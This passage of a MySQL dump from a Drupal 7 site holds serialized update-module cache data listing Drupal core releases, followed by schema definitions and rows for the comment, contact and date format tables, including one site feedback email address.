7.2\";s:7:\"version\";s:3:\"7.2\";s:3:\"tag\";s:3:\"7.2\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1168946\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.2.tar.gz\";s:4:\"date\";s:10:\"1306357017\";s:6:\"mdhash\";s:32:\"cf88c87e3694ebd15b62ba6f6a69124f\";s:8:\"filesize\";s:7:\"2731345\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.1\";a:13:{s:4:\"name\";s:10:\"drupal 7.1\";s:7:\"version\";s:3:\"7.1\";s:3:\"tag\";s:3:\"7.1\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1168910\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.1.tar.gz\";s:4:\"date\";s:10:\"1306354916\";s:6:\"mdhash\";s:32:\"27eb45cb894a76f3a9ae6715584a10cc\";s:8:\"filesize\";s:7:\"2713977\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:3:\"7.0\";a:13:{s:4:\"name\";s:10:\"drupal 7.0\";s:7:\"version\";s:3:\"7.0\";s:3:\"tag\";s:3:\"7.0\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1015392\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.0.tar.gz\";s:4:\"date\";s:10:\"1294208759\";s:6:\"mdhash\";s:32:\"e96c0a5e47c5d7706897384069dfb920\";s:8:\"filesize\";s:7:\"2728271\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:7:\"7.0-rc4\";a:14:{s:4:\"name\";s:14:\"drupal 7.0-rc4\";s:7:\"version\";s:7:\"7.0-rc4\";s:3:\"tag\";s:8:\"7.0-rc-4\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:3:\"rc4\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1010382\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.0-rc4.tar.gz\";s:4:\"date\";s:10:\"1293684084\";s:6:\"mdhash\";s:32:\"104c08e609c64bb1e45b55a7ad1ad857\";s:8:\"filesize\";s:7:\"2717666\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:7:\"7.0-rc3\";a:14:{s:4:\"name\";s:14:\"drupal 7.0-rc3\";s:7:\"version\";s:7:\"7.0-rc3\";s:3:\"tag\";s:8:\"7.0-rc-3\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:3:\"rc3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1005976\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.0-rc3.tar.gz\";s:4:\"date\";s:10:\"1293099424\";s:6:\"mdhash\";s:32:\"be9a3f190e2648fa03dcb2bf3d8be199\";s:8:\"filesize\";s:7:\"2719115\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:7:\"7.0-rc2\";a:14:{s:4:\"name\";s:14:\"drupal 7.0-rc2\";s:7:\"version\";s:7:\"7.0-rc2\";s:3:\"tag\";s:8:\"7.0-rc-2\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:3:\"rc2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/995778\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.0-rc2.tar.gz\";s:4:\"date\";s:10:\"1292101847\";s:6:\"mdhash\";s:32:\"f31982c73f1707ddccb2927325bc9cb9\";s:8:\"filesize\";s:7:\"2705734\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:7:\"7.0-rc1\";a:14:{s:4:\"name\";s:14:\"drupal 7.0-rc1\";s:7:\"version\";s:7:\"7.0-rc1\";s:3:\"tag\";s:8:\"7.0-rc-1\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:3:\"rc1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/985946\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.0-rc1.tar.gz\";s:4:\"date\";s:10:\"1291190142\";s:6:\"mdhash\";s:32:\"b554e79cf60c02d4dec592151c4b58ee\";s:8:\"filesize\";s:7:\"2694689\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:3:{i:0;s:15:\"Security update\";i:1;s:12:\"New features\";i:2;s:9:\"Bug fixes\";}}}s:9:\"7.0-beta3\";a:14:{s:4:\"name\";s:16:\"drupal 7.0-beta3\";s:7:\"version\";s:9:\"7.0-beta3\";s:3:\"tag\";s:9:\"7.0-beta3\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:5:\"beta3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/971088\";s:13:\"download_link\";s:60:\"http://ftp.drupal.org/files/projects/drupal-7.0-beta3.tar.gz\";s:4:\"date\";s:10:\"1289694735\";s:6:\"mdhash\";s:32:\"c942f010a2535586c4578cd7b107c652\";s:8:\"filesize\";s:7:\"2660883\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:3:{i:0;s:15:\"Security update\";i:1;s:12:\"New features\";i:2;s:9:\"Bug fixes\";}}}s:9:\"7.0-beta2\";a:14:{s:4:\"name\";s:16:\"drupal 7.0-beta2\";s:7:\"version\";s:9:\"7.0-beta2\";s:3:\"tag\";s:9:\"7.0-beta2\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:5:\"beta2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/950318\";s:13:\"download_link\";s:60:\"http://ftp.drupal.org/files/projects/drupal-7.0-beta2.tar.gz\";s:4:\"date\";s:10:\"1287812133\";s:6:\"mdhash\";s:32:\"c2de0bdb657b77af8c8369a355cab8ce\";s:8:\"filesize\";s:7:\"2638949\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:9:\"7.0-beta1\";a:14:{s:4:\"name\";s:16:\"drupal 7.0-beta1\";s:7:\"version\";s:9:\"7.0-beta1\";s:3:\"tag\";s:9:\"7.0-beta1\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:5:\"beta1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/934174\";s:13:\"download_link\";s:60:\"http://ftp.drupal.org/files/projects/drupal-7.0-beta1.tar.gz\";s:4:\"date\";s:10:\"1286422866\";s:6:\"mdhash\";s:32:\"490ce0d95eacc15f2918becd60f6821c\";s:8:\"filesize\";s:7:\"2622225\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha7\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha7\";s:7:\"version\";s:10:\"7.0-alpha7\";s:3:\"tag\";s:10:\"7.0-alpha7\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha7\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/913030\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha7.tar.gz\";s:4:\"date\";s:10:\"1284599764\";s:6:\"mdhash\";s:32:\"15183fcf862be97f7e96991e6e56fe2e\";s:8:\"filesize\";s:7:\"2586833\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha6\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha6\";s:7:\"version\";s:10:\"7.0-alpha6\";s:3:\"tag\";s:10:\"7.0-alpha6\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha6\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/848970\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha6.tar.gz\";s:4:\"date\";s:10:\"1278634809\";s:6:\"mdhash\";s:32:\"eb64647263affc36f76d1e7ffb751d32\";s:8:\"filesize\";s:7:\"2458211\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:3:{i:0;s:15:\"Security update\";i:1;s:12:\"New features\";i:2;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha5\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha5\";s:7:\"version\";s:10:\"7.0-alpha5\";s:3:\"tag\";s:10:\"7.0-alpha5\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha5\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/806978\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha5.tar.gz\";s:4:\"date\";s:10:\"1274628613\";s:6:\"mdhash\";s:32:\"de9c1d51f0ce730f7356bd0a160e8ce1\";s:8:\"filesize\";s:7:\"2424226\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha4\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha4\";s:7:\"version\";s:10:\"7.0-alpha4\";s:3:\"tag\";s:10:\"7.0-alpha4\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha4\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/782394\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha4.tar.gz\";s:4:\"date\";s:10:\"1272318014\";s:6:\"mdhash\";s:32:\"c8f371a388bc65b2211d7d29856fb993\";s:8:\"filesize\";s:7:\"2403384\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha3\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha3\";s:7:\"version\";s:10:\"7.0-alpha3\";s:3:\"tag\";s:10:\"7.0-alpha3\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/748690\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha3.tar.gz\";s:4:\"date\";s:10:\"1269192317\";s:6:\"mdhash\";s:32:\"9efc083f09d6b523d655bc90a6869945\";s:8:\"filesize\";s:7:\"2357934\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:3:{i:0;s:15:\"Security update\";i:1;s:12:\"New features\";i:2;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha2\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha2\";s:7:\"version\";s:10:\"7.0-alpha2\";s:3:\"tag\";s:10:\"7.0-alpha2\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/721114\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha2.tar.gz\";s:4:\"date\";s:10:\"1266777910\";s:6:\"mdhash\";s:32:\"cfbfdd2249638a266054f2532348065d\";s:8:\"filesize\";s:7:\"2314834\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha1\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha1\";s:7:\"version\";s:10:\"7.0-alpha1\";s:3:\"tag\";s:10:\"7.0-alpha1\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/685748\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha1.tar.gz\";s:4:\"date\";s:10:\"1263566711\";s:6:\"mdhash\";s:32:\"508109c6cf0ead868e02d8c3db2a4d1f\";s:8:\"filesize\";s:7:\"2283220\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:12:\"New features\";}}}s:7:\"7.x-dev\";a:13:{s:4:\"name\";s:14:\"Drupal 7.x-dev\";s:7:\"version\";s:7:\"7.x-dev\";s:3:\"tag\";s:3:\"7.x\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_extra\";s:3:\"dev\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/156281\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.x-dev.tar.gz\";s:4:\"date\";s:10:\"1426706281\";s:6:\"mdhash\";s:32:\"d46e2605320a7264d01a316bdf7a7bc9\";s:8:\"filesize\";s:7:\"3234888\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}}}',1426881607,1426795203,1),('fetch_failures','a:0:{}',1426795507,1426795203,1),('update_project_data','a:1:{s:6:\"drupal\";a:18:{s:4:\"name\";s:6:\"drupal\";s:4:\"info\";a:6:{s:4:\"name\";s:5:\"Block\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:16:\"_info_file_ctime\";i:1418161810;}s:9:\"datestamp\";s:10:\"1416429488\";s:8:\"includes\";a:33:{s:5:\"block\";s:5:\"Block\";s:5:\"color\";s:5:\"Color\";s:7:\"comment\";s:7:\"Comment\";s:7:\"contact\";s:7:\"Contact\";s:10:\"contextual\";s:16:\"Contextual links\";s:9:\"dashboard\";s:9:\"Dashboard\";s:5:\"dblog\";s:16:\"Database logging\";s:5:\"field\";s:5:\"Field\";s:17:\"field_sql_storage\";s:17:\"Field SQL storage\";s:8:\"field_ui\";s:8:\"Field UI\";s:4:\"file\";s:4:\"File\";s:6:\"filter\";s:6:\"Filter\";s:4:\"help\";s:4:\"Help\";s:5:\"image\";s:5:\"Image\";s:4:\"list\";s:4:\"List\";s:4:\"menu\";s:4:\"Menu\";s:4:\"node\";s:4:\"Node\";s:6:\"number\";s:6:\"Number\";s:7:\"options\";s:7:\"Options\";s:7:\"overlay\";s:7:\"Overlay\";s:4:\"path\";s:4:\"Path\";s:3:\"rdf\";s:3:\"RDF\";s:6:\"search\";s:6:\"Search\";s:8:\"shortcut\";s:8:\"Shortcut\";s:10:\"statistics\";s:10:\"Statistics\";s:6:\"system\";s:6:\"System\";s:8:\"taxonomy\";s:8:\"Taxonomy\";s:4:\"text\";s:4:\"Text\";s:7:\"toolbar\";s:7:\"Toolbar\";s:6:\"update\";s:14:\"Update manager\";s:4:\"user\";s:4:\"User\";s:6:\"bartik\";s:6:\"Bartik\";s:5:\"seven\";s:5:\"Seven\";}s:12:\"project_type\";s:4:\"core\";s:14:\"project_status\";b:1;s:10:\"sub_themes\";a:0:{}s:11:\"base_themes\";a:0:{}s:16:\"existing_version\";s:4:\"7.34\";s:14:\"existing_major\";s:1:\"7\";s:12:\"install_type\";s:8:\"official\";s:5:\"title\";s:11:\"Drupal core\";s:4:\"link\";s:37:\"https://www.drupal.org/project/drupal\";s:14:\"latest_version\";s:4:\"7.35\";s:8:\"releases\";a:1:{s:4:\"7.35\";a:13:{s:4:\"name\";s:11:\"drupal 7.35\";s:7:\"version\";s:4:\"7.35\";s:3:\"tag\";s:4:\"7.35\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"35\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.35-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.35.tar.gz\";s:4:\"date\";s:10:\"1426706281\";s:6:\"mdhash\";s:32:\"fecc55bd0bd476bc35d9ebf68452942d\";s:8:\"filesize\";s:7:\"3234349\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}}s:11:\"recommended\";s:4:\"7.35\";s:16:\"security updates\";a:1:{i:0;a:13:{s:4:\"name\";s:11:\"drupal 7.35\";s:7:\"version\";s:4:\"7.35\";s:3:\"tag\";s:4:\"7.35\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"35\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.35-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.35.tar.gz\";s:4:\"date\";s:10:\"1426706281\";s:6:\"mdhash\";s:32:\"fecc55bd0bd476bc35d9ebf68452942d\";s:8:\"filesize\";s:7:\"3234349\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}}s:6:\"status\";i:1;}}',1426851742,1426848142,1),('update_project_projects','a:1:{s:6:\"drupal\";a:8:{s:4:\"name\";s:6:\"drupal\";s:4:\"info\";a:6:{s:4:\"name\";s:5:\"Block\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:16:\"_info_file_ctime\";i:1418161810;}s:9:\"datestamp\";s:10:\"1416429488\";s:8:\"includes\";a:33:{s:5:\"block\";s:5:\"Block\";s:5:\"color\";s:5:\"Color\";s:7:\"comment\";s:7:\"Comment\";s:7:\"contact\";s:7:\"Contact\";s:10:\"contextual\";s:16:\"Contextual links\";s:9:\"dashboard\";s:9:\"Dashboard\";s:5:\"dblog\";s:16:\"Database logging\";s:5:\"field\";s:5:\"Field\";s:17:\"field_sql_storage\";s:17:\"Field SQL storage\";s:8:\"field_ui\";s:8:\"Field UI\";s:4:\"file\";s:4:\"File\";s:6:\"filter\";s:6:\"Filter\";s:4:\"help\";s:4:\"Help\";s:5:\"image\";s:5:\"Image\";s:4:\"list\";s:4:\"List\";s:4:\"menu\";s:4:\"Menu\";s:4:\"node\";s:4:\"Node\";s:6:\"number\";s:6:\"Number\";s:7:\"options\";s:7:\"Options\";s:7:\"overlay\";s:7:\"Overlay\";s:4:\"path\";s:4:\"Path\";s:3:\"rdf\";s:3:\"RDF\";s:6:\"search\";s:6:\"Search\";s:8:\"shortcut\";s:8:\"Shortcut\";s:10:\"statistics\";s:10:\"Statistics\";s:6:\"system\";s:6:\"System\";s:8:\"taxonomy\";s:8:\"Taxonomy\";s:4:\"text\";s:4:\"Text\";s:7:\"toolbar\";s:7:\"Toolbar\";s:6:\"update\";s:14:\"Update manager\";s:4:\"user\";s:4:\"User\";s:6:\"bartik\";s:6:\"Bartik\";s:5:\"seven\";s:5:\"Seven\";}s:12:\"project_type\";s:4:\"core\";s:14:\"project_status\";b:1;s:10:\"sub_themes\";a:0:{}s:11:\"base_themes\";a:0:{}}}',1426851742,1426848142,1); /*!40000 ALTER TABLE `dpl_cache_update` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_comment` -- DROP TABLE IF EXISTS `dpl_comment`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_comment` ( `cid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique comment ID.', `pid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_comment.cid to which this comment is a reply. If set to 0, this comment is not a reply to an existing comment.', `nid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_node.nid to which this comment is a reply.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_users.uid who authored the comment. If set to 0, this comment was created by an anonymous user.', `subject` varchar(64) NOT NULL DEFAULT '' COMMENT 'The comment title.', `hostname` varchar(128) NOT NULL DEFAULT '' COMMENT 'The author’s host name.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'The time that the comment was created, as a Unix timestamp.', `changed` int(11) NOT NULL DEFAULT '0' COMMENT 'The time that the comment was last edited, as a Unix timestamp.', `status` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT 'The published status of a comment. (0 = Not Published, 1 = Published)', `thread` varchar(255) NOT NULL COMMENT 'The vancode representation of the comment’s place in a thread.', `name` varchar(60) DEFAULT NULL COMMENT 'The comment author’s name. Uses dpl_users.name if the user is logged in, otherwise uses the value typed into the comment form.', `mail` varchar(64) DEFAULT NULL COMMENT 'The comment author’s e-mail address from the comment form, if user is anonymous, and the ’Anonymous users may/must leave their contact information’ setting is turned on.', `homepage` varchar(255) DEFAULT NULL COMMENT 'The comment author’s home page address from the comment form, if user is anonymous, and the ’Anonymous users may/must leave their contact information’ setting is turned on.', `language` varchar(12) NOT NULL DEFAULT '' COMMENT 'The dpl_languages.language of this comment.', PRIMARY KEY (`cid`), KEY `comment_status_pid` (`pid`,`status`), KEY `comment_num_new` (`nid`,`status`,`created`,`cid`,`thread`), KEY `comment_uid` (`uid`), KEY `comment_nid_language` (`nid`,`language`), KEY `comment_created` (`created`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores comments and associated data.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_comment` -- LOCK TABLES `dpl_comment` WRITE; /*!40000 ALTER TABLE `dpl_comment` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_comment` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_contact` -- DROP TABLE IF EXISTS `dpl_contact`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_contact` ( `cid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique category ID.', `category` varchar(255) NOT NULL DEFAULT '' COMMENT 'Category name.', `recipients` longtext NOT NULL COMMENT 'Comma-separated list of recipient e-mail addresses.', `reply` longtext NOT NULL COMMENT 'Text of the auto-reply message.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The category’s weight.', `selected` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Flag to indicate whether or not category is selected by default. (1 = Yes, 0 = No)', PRIMARY KEY (`cid`), UNIQUE KEY `category` (`category`), KEY `list` (`weight`,`category`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='Contact form category settings.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_contact` -- LOCK TABLES `dpl_contact` WRITE; /*!40000 ALTER TABLE `dpl_contact` DISABLE KEYS */; INSERT INTO `dpl_contact` VALUES (1,'Website feedback','piratolli@t9s.de','',0,1); /*!40000 ALTER TABLE `dpl_contact` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_date_format_locale` -- DROP TABLE IF EXISTS `dpl_date_format_locale`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_date_format_locale` ( `format` varchar(100) NOT NULL COMMENT 'The date format string.', `type` varchar(64) NOT NULL COMMENT 'The date format type, e.g. medium.', `language` varchar(12) NOT NULL COMMENT 'A dpl_languages.language for this format to be used with.', PRIMARY KEY (`type`,`language`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores configured date formats for each locale.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_date_format_locale` -- LOCK TABLES `dpl_date_format_locale` WRITE; /*!40000 ALTER TABLE `dpl_date_format_locale` DISABLE KEYS */; /*!40000 ALTER TABLE `dpl_date_format_locale` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_date_format_type` -- DROP TABLE IF EXISTS `dpl_date_format_type`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_date_format_type` ( `type` varchar(64) NOT NULL COMMENT 'The date format type, e.g. medium.', `title` varchar(255) NOT NULL COMMENT 'The human readable name of the format type.', `locked` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Whether or not this is a system provided format.', PRIMARY KEY (`type`), KEY `title` (`title`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores configured date format types.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_date_format_type` -- LOCK TABLES `dpl_date_format_type` WRITE; /*!40000 ALTER TABLE `dpl_date_format_type` DISABLE KEYS */; INSERT INTO `dpl_date_format_type` VALUES ('long','Long',1),('medium','Medium',1),('short','Short',1); /*!40000 ALTER TABLE `dpl_date_format_type` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_date_formats` -- DROP TABLE IF EXISTS `dpl_date_formats`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_date_formats` ( `dfid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The date format identifier.', `format` varchar(100) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT 'The date format string.', `type` varchar(64) NOT NULL COMMENT 'The date format type, e.g. medium.', `locked` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Whether or not this format can be modified.', PRIMARY KEY (`dfid`), UNIQUE KEY `formats` (`format`,`type`) ) ENGINE=InnoDB AUTO_INCREMENT=36 DEFAULT CHARSET=utf8 COMMENT='Stores configured date formats.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_date_formats` -- LOCK TABLES `dpl_date_formats` WRITE; /*!40000 ALTER TABLE `dpl_date_formats` DISABLE KEYS */; INSERT INTO `dpl_date_formats` VALUES (1,'Y-m-d H:i','short',1),(2,'m/d/Y - H:i','short',1),(3,'d/m/Y - H:i','short',1),(4,'Y/m/d - H:i','short',1),(5,'d.m.Y - H:i','short',1),(6,'m/d/Y - g:ia','short',1),(7,'d/m/Y - g:ia','short',1),(8,'Y/m/d - g:ia','short',1),(9,'M j Y - H:i','short',1),(10,'j M Y - H:i','short',1),(11,'Y M j - H:i','short',1),(12,'M j Y - g:ia','short',1),(13,'j M Y - g:ia','short',1),(14,'Y M j - g:ia','short',1),(15,'D, Y-m-d H:i','medium',1),(16,'D, m/d/Y - H:i','medium',1),(17,'D, d/m/Y - H:i','medium',1),(18,'D, Y/m/d - H:i','medium',1),(19,'F j, Y - H:i','medium',1),(20,'j F, Y - H:i','medium',1),(21,'Y, F j - H:i','medium',1),(22,'D, m/d/Y - g:ia','medium',1),(23,'D, d/m/Y - g:ia','medium',1),(24,'D, Y/m/d - g:ia','medium',1),(25,'F j, Y - g:ia','medium',1),(26,'j F Y - g:ia','medium',1),(27,'Y, F j - g:ia','medium',1),(28,'j. F Y - G:i','medium',1),(29,'l, F j, Y - H:i','long',1),(30,'l, j F, Y - H:i','long',1),(31,'l, Y, F j - H:i','long',1),(32,'l, F j, Y - g:ia','long',1),(33,'l, j F Y - g:ia','long',1),(34,'l, Y, F j - g:ia','long',1),(35,'l, j. F Y - G:i','long',1); /*!40000 ALTER TABLE `dpl_date_formats` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_field_config` -- DROP TABLE IF EXISTS `dpl_field_config`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE 